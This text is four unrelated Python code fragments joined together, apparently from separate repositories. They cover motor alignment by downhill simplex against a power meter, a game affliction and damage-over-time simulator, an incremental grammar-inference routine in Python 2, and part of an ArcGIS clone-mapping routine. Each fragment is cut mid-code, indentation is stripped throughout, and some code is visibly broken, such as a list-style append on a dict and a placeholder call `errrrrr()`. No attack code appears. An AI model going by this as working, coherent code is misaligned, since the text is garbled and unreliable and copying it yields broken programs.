motor3_target_position = motor_positions[2]
motor4_target_position = motor_positions[3]
pmc.move_axis_abs(axis=motor1, target_position=int(motor1_target_position))
pmc.move_axis_abs(axis=motor2, target_position=int(motor2_target_position))
pmc.move_axis_abs(axis=motor3, target_position=int(motor3_target_position))
pmc.move_axis_abs(axis=motor4, target_position=int(motor4_target_position))
#Sets motor's current position to 0. Used in randomize_initial_simplex function to set current positon to origin.
#Requires number of motor to be set to 0.
def set_motor_home(motor):
pmc.set_axis_home(axis=motor, home_position=0)
#Sets motor positions to 0 and randomizes the initial simplex of positions before optimization. Used all throughout optimize function.
#Requires the numbers of motors to have positions randomized and a range at which to search for positions from + to - the given range.
def randomize_initial_simplex(motor1, motor2, motor3, motor4, simplex_range):
global simplex, output_simplex
set_motor_home(motor1)
set_motor_home(motor2)
set_motor_home(motor3)
set_motor_home(motor4)
motors_position1 = [0, 0, 0, 0]
read_output()
output_position1 = average_output()
motors_position2 = np.random.randint(low=-(simplex_range/2), high=(simplex_range/2), size=4)
motors_position2 = motors_position2.tolist()
move_four_motors_abs(1, 2, 3, 4, motors_position2)
read_output()
output_position2 = average_output()
motors_position3 = np.random.randint(low=-(simplex_range/2), high=(simplex_range/2), size=4)
motors_position3 = motors_position3.tolist()
move_four_motors_abs(1, 2, 3, 4, motors_position3)
read_output()
output_position3 = average_output()
motors_position4 = np.random.randint(low=-(simplex_range/2), high=(simplex_range/2), size=4)
motors_position4 = motors_position4.tolist()
move_four_motors_abs(1, 2, 3, 4, motors_position4)
read_output()
output_position4 = average_output()
motors_position5 = np.random.randint(low=-(simplex_range/2), high=(simplex_range/2), size=4)
motors_position5 = motors_position5.tolist()
move_four_motors_abs(1, 2, 3, 4, motors_position5)
read_output()
output_position5 = average_output()
simplex = [motors_position1, motors_position2, motors_position3,
motors_position4, motors_position5]
output_simplex = [output_position1, output_position2, output_position3,
output_position4, output_position5]
#Used in order function so the simplex can be sorted by outputs.
#Requires no inputted val and sorts by last element in array.
def sort_by_output(val):
return val[-1]
#Orders simplex positions from least to greatest output. Used all throughout optimize function.
#Requires simplex and output_simplex arrays.
def order(positions, output_positions):
simplex[0].append(output_simplex[0])
simplex[1].append(output_simplex[1])
simplex[2].append(output_simplex[2])
simplex[3].append(output_simplex[3])
simplex[-1].append(output_simplex[-1])
simplex.sort(key=sort_by_output)
output_simplex.sort()
x = output_simplex[0]
simplex[0].remove(x)
x = output_simplex[1]
simplex[1].remove(x)
x = output_simplex[2]
simplex[2].remove(x)
x = output_simplex[3]
simplex[3].remove(x)
x = output_simplex[-1]
simplex[-1].remove(x)
#Solves for the centroid of the simplex excluding the worst position. Used in elements of downhill_simplex and optimize function.
#Requires no inputs and uses whatever the current global simplex is.
def centroid():
global centroid_position, best_position, worst_position
number_of_motors = 4
best_position = np.array(simplex[-1])
worst_position = np.array(simplex[0])
centroid_position = (best_position + np.array(simplex[3]) +
np.array(simplex[2]) + np.array(simplex[1]))/(number_of_motors)
#Solves for a position reflected from the worst position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def reflection(motor1, motor2, motor3, motor4):
global reflection_position, reflection_output
reflection_position = centroid_position + 1 * (centroid_position - worst_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, reflection_position)
read_output()
reflection_output = average_output()
#Solves for a position expanded from the reflected position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def expansion(motor1, motor2, motor3, motor4):
global expansion_position, expansion_output
expansion_position = centroid_position + 2 * (reflection_position - centroid_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, expansion_position)
read_output()
expansion_output = average_output()
#Solves for a position contracted inside the simplex. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def contraction(motor1, motor2, motor3, motor4):
global contraction_position, contraction_output
contraction_position = centroid_position + 0.5 * (worst_position - centroid_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, contraction_position)
read_output()
contraction_output = average_output()
#Solves for all new simplex positions shrunk toward the current best position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def shrink(motor1, motor2, motor3, motor4):
global shrink_position1, shrink_output1, shrink_position2, shrink_output2, shrink_position3, shrink_output3, shrink_position4, shrink_output4
shrink_position1 = best_position + 0.5 * (worst_position - best_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, shrink_position1)
read_output()
shrink_output1 = average_output()
shrink_position2 = best_position + 0.5 * (np.array(simplex[1]) - best_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, shrink_position2)
read_output()
shrink_output2 = average_output()
shrink_position3 = best_position + 0.5 * (np.array(simplex[2]) - best_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, shrink_position3)
read_output()
shrink_output3 = average_output()
shrink_position4 = best_position + 0.5 * (np.array(simplex[3]) - best_position)
move_four_motors_abs(motor1, motor2, motor3, motor4, shrink_position4)
read_output()
shrink_output4 = average_output()
#Corrects hysteresis through a process of moving two motors relatively in an output increasing direction. Used in optimize function when local max is found.
#Requires the numbers of the motors to be corrected. Corrected motors should usually the two horizontals together and two verticals together.
def correct_hysteresis(motor1, motor2):
motor1_motion = 50
motor2_motion = 50
counter = 0
read_output()
prev_output = average_output()
move_one_motor_rel(motor1, motor1_motion)
read_output()
new_output = average_output()
if new_output < prev_output:
motor1_motion = -motor1_motion
move_one_motor_rel(motor1, 2*motor1_motion)
read_output()
new_output = average_output()
prev_output = new_output
move_one_motor_rel(motor2, motor2_motion)
read_output()
new_output = average_output()
if new_output < prev_output:
motor2_motion = -motor2_motion
move_one_motor_rel(motor2, 2*motor2_motion)
read_output()
new_output = average_output()
while new_output >= prev_output:
prev_output = new_output
move_two_motors_rel(motor1, motor2, motor1_motion, motor2_motion)
read_output()
new_output = average_output()
move_two_motors_rel(motor1, motor2, -motor1_motion, -motor2_motion)
#Explores one motor in one direction 2000 steps by moving this far and working back to the original position 100 steps at a time. Used in optimize function.
#Requires the motor to be explored and the direction of exploration (1 is forward and -1 is backward).
def explore_motor(motor, direction):
explore_step = 100
if direction < 0:
explore_step = -explore_step
explore_counter = 20
best_count = 0
read_output()
target_output = average_output()
move_one_motor_rel(motor, explore_counter*explore_step)
while explore_counter >= 0:
explore_counter = explore_counter - 1
move_one_motor_rel(motor, -explore_step)
read_output()
explore_output = average_output()
if explore_output > target_output:
best_count = explore_counter
target_output = explore_output
move_one_motor_rel(motor, explore_step*best_count)
#Optimizes four motors and finds a local maximum of power. Begins with intializing a simplex and performing downhill simplex. After three iterations of same best postion
#this function corrects for hystersis and prompts the user to decide if they would like to continue optimizing. If a low ouput is found, optimizer will explore to find
#the global peak instead. Optimization with stop if desired power is achieved.
#Requires the numbers of the motors being optimized and a desired output power in mW.
#Input the mirrors' horizontal motors as motor1 and motor3 and the mirrors' vertical motors as motor2 and motor4.
def optimize(motor1, motor2, motor3, motor4, desired_power):
global simplex, output_simplex
# simplex_counter = 0
hysteresis_counter = 0
hysteresis_corrected = False
if power_meter == 'PM100A':
input("Start at lowest range setting (R 5.6uW) and | |
<gh_stars>0
from collections import defaultdict, namedtuple
from core.timeline import *
from core.log import *
import random
AFFLICT_LIST = ['poison', 'paralysis', 'burn', 'blind', 'bog', 'stun', 'freeze', 'sleep', 'frostbite']
class Dot(object):
"""
Damage over time; e.g. poison
"""
def __init__(self, name, coef, duration, iv, dtype=None):
self.name = name
self.dtype = dtype
self.active = 0
self.coef = coef
self.iv = iv # Seconds between each damage tick
self.duration = duration
self.true_dmg_event = Event('true_dmg')
self.true_dmg_event.dname = name
self.true_dmg_event.dtype = dtype if dtype else name
self.true_dmg_event.comment = ''
self.tick_dmg = 0
self.quickshot_event = Event('dmg_formula')
self.tick_timer = Timer(self.tick_proc)
self.dotend_timer = Timer(self.dot_end_proc)
def dot_end_proc(self, t):
log('dot', self.name, 'end\t')
self.active = 0
self.tick_timer.off()
self.cb_end()
def cb_end(self):
pass
def tick_proc(self, t):
if self.active == 0:
return
t.timing += self.iv
self.true_dmg_event.count = self.tick_dmg
self.true_dmg_event.on()
def __call__(self):
return self.on()
def get(self):
return self.active
def on(self):
if self.active:
log('dot', self.name, 'failed\t')
return 0
self.active = 1
self.tick_timer.on(self.iv)
self.dotend_timer.on(self.duration)
self.quickshot_event.dmg_coef = self.coef
self.quickshot_event.dname = self.name
self.quickshot_event.dtype = self.dtype if self.dtype else self.name
self.quickshot_event()
self.tick_dmg = self.quickshot_event.dmg
log('dot', self.name, 'start\t', '%f/%d' % (self.iv, self.duration))
return 1
def off(self):
self.tick_timer.off()
self.dotend_timer.off()
log('dot', self.name, 'end by other reason')
class AfflicUncapped(object):
def __init__(self, name=None):
self.name = name
self.resist = 0
self.rate = 1
self.tolerance = 0.2
self.duration = 12
self.states = None
self.stacks = []
self._get = 0.0
self.c_uptime = (0, 0)
self.last_afflict = 0
Timer(self.uptime, repeat=1).on(1)
def get_tolerance(self):
if self.tolerance > 1:
return float(self.tolerance) / 100.0
else:
return self.tolerance
def get_rate(self):
if self.rate > 2:
return float(self.rate) / 100.0
else:
return self.rate
def get_resist(self):
if self.resist > 1:
return float(self.resist) / 100.0
else:
return self.resist
def get(self):
return self._get
def update(self):
nostack_p = 1.0
for stack_p in self.stacks:
nostack_p *= 1.0 - stack_p
self._get = 1.0 - nostack_p
def stack_end_fun(self, p):
def end_callback(t):
self.stacks.remove(p)
self.update()
return end_callback
def __call__(self, *args, **argv):
return self.on(*args, **argv)
def on(self):
self.resist = self.get_resist()
self.rate = self.get_rate()
self.tolerance = self.get_tolerance()
if self.states is None:
self.states = defaultdict(lambda: 0.0)
self.states[self.resist] = 1.0
states = defaultdict(lambda: 0.0)
total_success_p = 0.0
for res, state_p in self.states.items():
if res >= self.rate or res >= 1:
states[res] += state_p
else:
rate_after_res = min(1.0, self.rate - res)
success_p = state_p * rate_after_res
fail_p = state_p * (1.0 - rate_after_res)
total_success_p += success_p
states[res + self.tolerance] += success_p
states[res] += fail_p
self.states = states
self.stacks.append(total_success_p)
Timer(self.stack_end_fun(total_success_p), self.duration).on()
self.update()
return total_success_p
def uptime(self, t):
next_r = self.get()
next_t = now()
if next_r == 0:
self.last_afflict = next_t
prev_r, prev_t = self.c_uptime
rate = prev_r + next_r*(next_t-prev_t)
self.c_uptime = (rate, next_t)
if next_t > 0 and rate > 0 and next_t % 60 == 0:
log('{}_uptime'.format(self.name), '{:.2f}/{:.2f}'.format(rate, next_t), '{:.2%}'.format(rate/next_t))
class AfflicCapped(object):
State = namedtuple("State", "timers resist")
def __init__(self, name=None, duration=12):
self.name = name
self.resist = 0
self.rate = 1
self.tolerance = 0.2
self.default_duration = duration
self.duration = duration
self.stack_cap = 1
self.states = None
self._get = 0.0
self.c_uptime = (0, 0)
self.last_afflict = 0
Timer(self.uptime, repeat=1).on(1)
def get_tolerance(self):
if self.tolerance > 1:
return float(self.tolerance) / 100.0
else:
return self.tolerance
def get_rate(self):
if self.rate > 2:
return float(self.rate) / 100.0
else:
return self.rate
def get_resist(self):
if self.resist > 1:
return float(self.resist) / 100.0
else:
return self.resist
def get(self):
return self._get
def update(self):
total_p = 0.0
states = defaultdict(lambda: 0.0)
for state, state_p in self.states.items():
reduced_state = self.State(frozenset([t for t in state.timers if t.timing > now()]), state.resist)
states[reduced_state] += state_p
if reduced_state.timers:
total_p += state_p
self.states = states
self._get = total_p
return total_p
def stack_end(self, t):
self.update()
def __call__(self, *args, **argv):
return self.on(*args, **argv)
def on(self):
self.resist = self.get_resist()
self.rate = self.get_rate()
self.tolerance = self.get_tolerance()
timer = Timer(self.stack_end, self.duration).on()
if self.states is None:
self.states = defaultdict(lambda: 0.0)
self.states[self.State(frozenset(), self.resist)] = 1.0
states = defaultdict(lambda: 0.0)
total_p = 0.0
for start_state, start_state_p in self.states.items():
res = start_state.resist
if res >= self.rate or res >= 1 or len(start_state.timers) >= self.stack_cap:
states[start_state] += start_state_p
else:
rate_after_res = min(1, self.rate - res)
succeed_timers = frozenset(list(start_state.timers) + [timer])
state_on_succeed = self.State(succeed_timers, min(1.0, res + self.tolerance))
overall_succeed_p = start_state_p * rate_after_res
overall_fail_p = start_state_p * (1.0 - rate_after_res)
total_p += overall_succeed_p
states[state_on_succeed] += overall_succeed_p
if overall_fail_p > 0:
states[start_state] += overall_fail_p
self.states = states
self.update()
return total_p
def uptime(self, t):
next_r = self.get()
next_t = now()
if next_r == 0:
self.last_afflict = next_t
prev_r, prev_t = self.c_uptime
rate = prev_r + next_r*(next_t-prev_t)
self.c_uptime = (rate, next_t)
if next_t > 0 and rate > 0 and next_t % 60 == 0:
log('{}_uptime'.format(self.name), '{:.2f}/{:.2f}'.format(rate, next_t), '{:.2%}'.format(rate/next_t))
class Afflic_dot(AfflicUncapped):
def __init__(self, name=None, duration=12, iv=3.99):
super().__init__(name)
self.coef = 0.97
self.default_duration = duration
self.duration = duration
self.default_iv = iv
self.iv = iv
def on(self, name, rate, coef, duration=None, iv=None, dtype=None):
self.rate = rate
self.coef = coef
self.dtype = dtype
self.duration = duration or self.default_duration
self.iv = iv or self.default_iv
dot = Dot('o_%s_%s' % (name, self.name), coef, self.duration, self.iv, self.dtype)
dot.on()
r = super().on()
dot.tick_dmg *= r
return r
class Afflic_cc(AfflicCapped):
def __init__(self, name=None, duration=6.5):
super().__init__(name, duration)
self.stack_cap = 1
def on(self, name, rate, duration=None):
self.rate = rate
self.duration = duration or self.default_duration
return super().on()
def cb_end(self):
pass
class Afflic_scc(AfflicCapped):
def __init__(self, name=None, duration=8):
super().__init__(name, duration)
self.stack_cap = 1
def on(self, name, rate, duration=None):
self.rate = rate
self.duration = duration or self.default_duration
return super().on()
def cb_end(self):
pass
class Afflic_bog(Afflic_scc):
def on(self, name, rate, duration=None):
p = super().on(name, rate, duration)
if p:
from core.advbase import Debuff
Debuff('{}_bog'.format(name),-0.5*p,self.duration,1,'att','bog').on()
return p
class Afflics(object):
def __init__(self):
self.rinit()
self.poison = Afflic_dot('poison', duration=15, iv=2.99)
self.burn = Afflic_dot('burn', duration=12, iv=3.99)
self.paralysis = Afflic_dot('paralysis', duration=13, iv=3.99)
self.frostbite = Afflic_dot('frostbite', duration=21, iv=2.99)
self.blind = Afflic_scc('blind', duration=8)
self.bog = Afflic_bog('bog', duration=8)
self.freeze = Afflic_cc('freeze', duration=4.5)
self.stun = Afflic_cc('stun', duration=6.5)
self.sleep = Afflic_cc('sleep', duration=6.5)
self.poison.resist = 0
self.burn.resist = 0
self.paralysis.resist = 0
self.blind.resist = 80
self.bog.resist = 100
self.freeze.resist = 80
self.stun.resist = 80
self.sleep.resist = 80
self.frostbite.resist = 0
self.poison.tolerance = 5
self.burn.tolerance = 5
self.paralysis.tolerance = 5
self.blind.tolerance = 10
self.bog.tolerance = 20
self.freeze.tolerance = 20
self.stun.tolerance = 20
self.sleep.tolerance = 20
self.frostbite.tolerance = 5
def add(self, name, atype, rate, duration, coef=0, iv=0):
if atype == 'burning':
atype = 'burn'
if atype == 'para':
atype = 'paralysis'
if atype in ['poison', 'burn', 'paralysis']:
return self.add_dot(name, atype, rate, coef, duration, iv)
elif atype in ['blind', 'freeze', 'stun', 'sleep', 'bog']:
return self.add_cc(name, atype, rate, coef, duration, iv)
def get(self, atype):
if atype in ['poison', 'burn', 'paralysis']:
stack = 0
for i in self.dot:
if i[0] == atype and i[1].get():
stack += 1
return stack
elif atype in ['blind', 'freeze', 'stun', 'sleep', 'bog']:
if atype in self.cc:
return self.cc[atype].get()
def r(self):
return random.random() / self.luck
def refresh_dot(self):
tmp = []
for i in self.dot:
if i[1].get():
tmp.append(i)
self.dot = tmp
def refresh_cc(self):
tmp = {}
for i in self.cc:
if self.cc[i].get():
tmp.append(i)
self.cc = tmp
def add_dot(self, name, atype, rate, coef, duration, iv):
if not iv:
errrrrr()
if self.resist[atype] < 100:
r = self.r()
log('afflic', rate, self.resist[atype], r * 100)
if rate < self.resist[atype]:
return 0
if r * 100 < (rate - self.resist[atype]):
log('afflic', 'succ', name, atype)
self.refresh_dot()
dot = Dot('o_' + name + '_' + atype, coef, duration, iv)
dot.on()
self.dot.append((atype, dot))
self.resist[atype] += 20 # 5
return 1
else:
log('afflic', 'perfect_resist')
return 0
def add_cc(self, name, atype, rate, coef, duration, iv):
if self.resist[atype] < 100:
r = self.r()
log('afflic', rate, self.resist[atype], r * 100)
if atype in self.cc:
self.cc[atype].on()
return 0
elif rate < self.resist[atype]:
return 0
elif r * 100 < (rate - self.resist[atype]):
log('afflic', 'succ', name, atype)
self.refresh_cc()
cc = Dot('o_' + name + '_' + atype, 0, duration, duration + 0.01)
cc.on()
self.cc[atype] = cc
if atype == 'blind':
self.resist[atype] += 20 # 10
else: # elif atype in ['freeze','stun','sleep','bog']:
self.resist[atype] += 20
return 1
else:
log('afflic', 'perfect_resist')
return 0
def get_uptimes(self):
uptimes = {}
# for atype in ['poison', 'burn', 'paralysis', 'blind', 'freeze', 'stun', 'sleep', 'bog']:
for atype in AFFLICT_LIST:
aff = self.__dict__[atype]
rate, t = aff.c_uptime
# last = aff.last_afflict
| |
t in newTargetsInt:
#create a graph
G = nx.DiGraph()
edgeLabels = {} #used for saving non-terminals
G.add_nodes_from([0, len(t)+1])
for i in range(len(t)):
G.add_edge(i, i+1)
edgeLabels[(i,i+1)] = -1
# print 'ntYields.keys()', ntYields.keys()
# print 't', t
for nt in ntYields:
newEdgesStarts = KnuthMorrisPratt(t, ntYields[nt][0])
# print 't', t
# print 'ntYields[nt]', nt, ntYields[nt][0]
# print 'newEdgesStarts', newEdgesStarts
for s in newEdgesStarts:
G.add_edge(s, s+len(ntYields[nt][0]))
edgeLabels[(s, s+len(ntYields[nt][0]))] = nt
# paths = nx.shortest_path(G, source=0, target=len(t), weight=None)
shortestPaths = nx.all_shortest_paths(G, source=0, target=len(t), weight=None)
shortestPaths = [p for p in shortestPaths]
shortestPaths = [shortestPaths[0]]
# if len(shortestPaths) >= 2:
# print 'YES'
newParsedTargets.append([])
for paths in shortestPaths:
## sys.stderr.write(str(paths) + 'paths\n')
## paths = random.choice(list(nx.all_simple_paths(G, source=0, target=len(t))))
## ctr = 1
# for p in nx.all_simple_paths(G, source=0, target=len(t)):
# paths = p
## sys.stderr.write(str(ctr) + '\n')
## ctr += 1
# break
# sys.stderr.write(str(list(nx.all_simple_paths(G, source=0, target=len(t)))) + 'paths\n')
# sys.exit()
#all shortest paths
# print 'edgeLabels', edgeLabels
# print 'edges', G.edges()
# print 'paths', paths
# for i in range(len(paths[0])):
optimalParsing = []
for i in range(len(paths)-1):
if edgeLabels[(paths[i], paths[i + 1])] == -1:
# print t[paths[i]],
optimalParsing.append(t[paths[i]])
else:
# print edgeLabels[(paths[i],paths[i+1])],
optimalParsing.append(edgeLabels[(paths[i],paths[i+1])])
countingNumberOfOptimalParsings_Recombination += 1
# print
# sys.exit()
# if len(t) > len(optimalParsing):
# print 'yaaaaaaaaaaay1'
optimallyParsedTargetInts.append(optimalParsing)
# newParsedTargets.append(optimalParsing)
newParsedTargets[-1].append(optimalParsing)
# if len(newParsedTargets[-1]) >= 2:
# print 'YES'
ratios.append(float(len(optimalParsing))/len(t))
optimalParsingCombinations = list(itertools.product(*newParsedTargets))
# print 'combs'
# print optimalParsingCombinations
previousCost = g.grammarCost(CostFunction.EdgeCost)
originalCost = previousCost
for t in newTargetsInt:
originalCost += len(t)
intermediateCost = previousCost
optCost = 0
for s in optimallyParsedTargetInts:
intermediateCost += len(s)
optCost += len(s)
# print str(intermediateCost) + '\t',
# add newly parsed targets to grammar and convert grammardic to new grammar
# for t in optimallyParsedTargetInts:
# grammarDic[0].append(t)
# sys.stderr.write(str(x) + ' 2\n')
previousDic = g.dic
minCost = totalLengthNewTargets
minParsing = []
for optimallyParsedTargetInts in optimalParsingCombinations:
# print optimallyParsedTargetInts
g = None
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for t in optimallyParsedTargetInts:
for c in t:
tmpOut.write(str(c) + ' ')
tmpOut.write('\n')
tmpOut.close()
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# os.remove('tmpOut.txt')
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# if previousCost + g.grammarCost(CostFunction.EdgeCost) < intermediateCost:
# print 'yaaaaaaaaaaay2',
# sys.stderr.write(str(x) + ' 22\n')
# g.printGrammarWithOffsetToNTs(printIntsGrammar, maxInt, inputDic=previousDic)
# g = Grammar(open('tmpGram.txt', 'r'), 'grammar', gap, chFlag, noNewLineFlag)
# if len(optimalParsingCombinations) >= 2:
# print 'minCost\t' + str(g.grammarCost(CostFunction.EdgeCost))
if minCost >= g.grammarCost(CostFunction.EdgeCost):
# if minCost != totalLengthNewTargets:
# print 'diff' + '\t' + str(minCost) + '\t' + str(g.grammarCost(CostFunction.EdgeCost))
minCost = g.grammarCost(CostFunction.EdgeCost)
minParsing = optimallyParsedTargetInts
if firstChoice:
break
g = None
total_length_new_target_set_after_parsing = 0
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for t in minParsing:
total_length_new_target_set_after_parsing += len(t)
for c in t:
tmpOut.write(str(c) + ' ')
tmpOut.write('\n')
tmpOut.close()
# print 'tttttttttt', total_length_new_target_set_after_parsing
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# os.remove('tmpOut.txt')
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# g.printGrammarToFile(sys_args[-1] + "incGlex_" + str(x)+'.txt', printIntsGrammar)
newGrammarDic = g.grammarDic()
# print newGrammarDic
maxIntChar = -1
for nt in grammarDic:
for rule in grammarDic[nt]:
for c in rule:
if maxIntChar < int(c):
maxIntChar = int(c)
maxIntChar += 2
newNts = {}
for nt in sorted(newGrammarDic.keys()):
# if nt in grammarDic:
if nt != 0:
newNts[nt] = nt + maxIntChar
maxIntChar += 2
tmpNewGrammarDic = {}
for nt in newGrammarDic:
tmpRHS = []
# if nt == 0:
for rule in newGrammarDic[nt]:
# print rule
tmpRRHS = []
for c in rule:
# if c == 1507:
# print 'wowowow', newGrammarDic[1507]
if c in g.dic:
tmpRRHS.append(int(g.dic[c]))
else:
if c in newNts:
tmpRRHS.append(int(newNts[c]))
else:
tmpRRHS.append(int(c))
if nt!=0:
if tmpRRHS[0] == newNts[nt]:
print 'damn!'
print nt
print tmpRRHS
print rule
print newGrammarDic[nt]
tmpRHS.append(tmpRRHS)
# else:
# for c in newGrammarDic[nt]:
# print c
# if c in g.dic:
# tmpRHS.append(int(g.dic[c]))
# else:
# tmpRHS.append(int(c))Q
if nt in newNts:
tmpNewGrammarDic[newNts[nt]] = tmpRHS
else:
newGrammarDic[nt] = tmpRHS
for nt in newNts:
newGrammarDic.pop(nt)
for nt in tmpNewGrammarDic:
newGrammarDic[nt] = tmpNewGrammarDic[nt]
# print newGrammarDic
# print grammarDic
for nt in newGrammarDic:
if nt in grammarDic:
if nt == 0:
grammarDic[nt].extend(newGrammarDic[nt])
else:
# print nt, newGrammarDic[nt]
# grammarDic[nt + maxIntChar] = newGrammarDic[nt]
# print 1, nt + maxIntChar
# print 3, grammarDic[1507]
# maxIntChar += 2
print 'error'
sys.exit(0)
else:
# print nt, newGrammarDic[nt]
grammarDic[nt] = newGrammarDic[nt]
# grammarDic[nt + maxIntChar] = newGrammarDic[nt]
# print 2, nt + maxIntChar
# print 4, grammarDic[1507]
# maxIntChar += 2
# sys.stderr.write(str(x) + ' 3\n')
g.initFromGrammarDic(grammarDic, previousDic)
# break
# while True:
# maxR = g.retreiveMaximumGainRepeat(rFlag, CostFunction.EdgeCost)
# if maxR['score'] == -1:
# break
# else:
# # print '\tmaxR'
# sys.stderr.write(str(maxR) + '\n')
# g.replaceRepeat(maxR['length'], maxR['occs'])
# g.printGrammar(printIntsGrammar)
# print countingNumberOfOptimalParsings_Recombination
if len(tmp_dataset) - prev_len_tmp_dataset > data_increment * float(LEN_MAIN):
lengthPer = str(int(math.floor((float(len(tmp_dataset)) / float(LEN_MAIN)) * 100)))
# print len(tmp_dataset), LEN_MAIN, lengthPer
###print 'Length %', lengthPer
###g.printGrammarToFile(folder + fileName + '-' + lengthPer, printIntsGrammar)
prev_len_tmp_dataset = len(tmp_dataset)
###g.printGrammarToFile(folder + fileName + '-100.txt', printIntsGrammar)
return g
# print
# print str(originalCost) + '\t' + str(intermediateCost) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)-previousCost) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# g.printGrammarToFile(sys_args[-1]+str(x/batchSize+1)+'.txt', printIntsGrammar)
# print str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# print str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)-previousCost) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# g.printGrammarToFile(sys_args[-1]+'gram'+str(numData)+'.txt', printIntsGrammar)
# g.printGrammarToFile('tmpGram.txt', printIntsGrammar)
# sys.stderr.write(str(numData) + '\n')
# try:
# print str(totalLength) + '\t' + str(totalLengthNewTargets) + '\t' + str(intermediateCost-previousCost) + '\t' + str(totalLengthNewTargets-(intermediateCost-previousCost)) + '\t' + str((intermediateCost-previousCost)-(intermediateCost-g.grammarCost(CostFunction.EdgeCost))) + '\t' + str(intermediateCost-g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost))\
# + '\t' + str(structSimTest(open('tmpGram.txt','r').read(),\
# open('/Users/payamsiyari/Desktop/inc/inc-fullProfile/clean-slate full profile/gram' + str(numData) + '.txt','r').read()))
# except:
# pass
# previousDic = g.dic
# g = None
# tmpOut = open('tmpOut.txt','w')
# for t in newParsedTargets:
# for c in t:
# tmpOut.write(str(c) + ' ')
# tmpOut.write('\n')
# tmpOut.close()
# g = Grammar(open('tmpOut.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# g.printGrammarWithOffsetToNTs(printIntsGrammar, maxInt, inputDic=previousDic)
# g.printGrammarToFile(sys_args[-1]+'.txt', printIntsGrammar)
#Only for target ratio testing
# sumNewLengths = 0
# for t in optimallyParsedTargetInts:
# sumNewLengths += len(t)
# return sumNewLengths
return ratios
def idea3_Fixed_TGM4_Glexis(input_file_path, givenGrammar=None, batchSize=10, init=.05, gap=50, chFlag=SequenceType.SpaceSeparated, noNewLineFlag=True, working_path = ''):
folder = '/'.join(input_file_path.split('/')[:-1]) + '/INC-DAGs/inc-b'+str(batchSize)+'/'
# folder = 'TBTG/NewData3/Data/INC-DAGs'
# if not os.path.exists(folder):
# os.makedirs(folder)
fileName = input_file_path.split('/')[-1].split('.')[0]
firstChoice = True
mainFile = open(input_file_path, 'r').read().splitlines()
LEN_MAIN = len(mainFile)
# data_increment = 0.1
data_increment = float(batchSize) / LEN_MAIN
counter = 0
initData = []
for l in mainFile:
if counter < init*LEN_MAIN:
initData.append(mainFile.pop(0))
else:
break
counter += 1
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for l in initData:
tmpOut.write(l + '\n')
tmpOut.close()
aFlag = False;fFlag = False;chFlag = SequenceType.SpaceSeparated;printIntsGrammar = False;quietLog = True;
rFlag = 'mr';cFlag = 'mr';pairFlag = 'c';functionFlag = 'r';noNewLineFlag = False;loadGrammarFlag = False;
gap = 50
if givenGrammar == None:
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# totalLength = open('tmpOut-'+str(batchSize) + fileName + '--.txt', 'r').read().count(' ')
# numData = open('tmpOut-'+str(batchSize) + fileName + '--.txt', 'r').read().count('\n')
# totalLength = 1496
reverseDic = {}
maxInt = -1
for c in g.dic:
if maxInt < c:
maxInt = c + 2
reverseDic[g.dic[c]] = c
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
###g.printGrammarToFile(folder + fileName + '-0.txt',printIntsGrammar)
seedCost = g.grammarCost(CostFunction.EdgeCost)
# output = open('tmpGram.txt', 'w')
# output.write('\n')
# output.close()
# g.printGrammarWithOffsetToNTs(printIntsGrammar, 0)
# g.printGrammar(printIntsGrammar)
# return
# allNewTargets = open(sys_args[-2], 'r').read().splitlines()
allNewTargets = mainFile
else:
g = Grammar(open(givenGrammar, 'r'), 'grammar', gap, chFlag, noNewLineFlag)
reverseDic = {}
maxInt = -1
for c in g.dic:
if maxInt < c:
maxInt = c + 2
reverseDic[g.dic[c]] = c
allNewTargets = open(input_file_path, 'r').read().splitlines()
LEN = len(allNewTargets)
ratios = []
newParsedTargets = []
ntYields = {}
countingNumberOfOptimalParsings_Recombination = 0
countingNumberOfGlexises_Innovation = 0
tmp_dataset = []
prev_len_tmp_dataset = 0
remaining_batch_targets = []
for x in range(0, len(allNewTargets), | |
clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
if "headerPanel" in app_json and "selectors" in app_json["headerPanel"]:
for selector in app_json["headerPanel"]["selectors"]:
if "datasets" in selector:
for dataset in selector["datasets"]:
if "dataSource" in dataset and "itemId" in dataset["dataSource"]:
# in some cases the layer ids may have changed when cloning
# so we can use a mapping between the old and new to update it
for url, cloned_service in clone_mapping['Services'].items():
if cloned_service['id'] == clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]:
# update the layer id
